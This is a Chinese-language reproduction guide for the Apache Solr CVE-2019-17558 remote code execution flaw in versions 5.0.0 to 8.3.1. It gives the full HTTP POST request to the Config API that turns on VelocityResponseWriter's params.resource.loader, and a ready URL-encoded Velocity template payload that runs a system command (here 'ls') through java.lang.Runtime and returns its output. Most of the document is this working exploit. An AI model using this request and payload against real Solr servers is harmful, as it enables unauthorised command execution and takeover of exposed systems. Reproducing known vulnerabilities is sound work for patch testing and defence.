Apache Solr CVE-2019-17558漏洞复现

Apache Solr简介

Apache Solr是一个企业级搜索平台,用Java编写且开源,基于Apache Lucene项目。

复现部分一共分为两步

条件:

  1. Solr控制台未设置鉴权(默认),或登录凭证被猜出,这样就能访问到Config API。
  2. 一个core(索引库)对应一个solrconfig.xml。当某个core(索引库)的solrconfig.xml使用了以下配置,才会受该漏洞影响。
  3. 版本:5.0.0 到 8.3.1 版本

第一步:设置VelocityResponseWriter插件的params.resource.loader.enabled选项设置为true

params.resource.loader.enabled是用来控制是否允许用户在http请求中使用指定模板,但是这个选项默认是false,所以我们需要将他设置为true。

可以看到在未设置前,params.resource.loader.enabled是false。

接下来就是将params.resource.loader.enabled选项设置为true

POST /solr/demo/config HTTP/1.1
Host: IP:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

设置后我看再访问IP:8983/solr/demo/config可以看到选项变为true。

这一步后可以看到在/var/solr/data/demo/conf多出了一个configoverlay.json文件

第二步直接REC

注入 Velocity 模板即可执行任意命令

Payload

http://ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ls%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

命令就在exec('ls')

Q.E.D.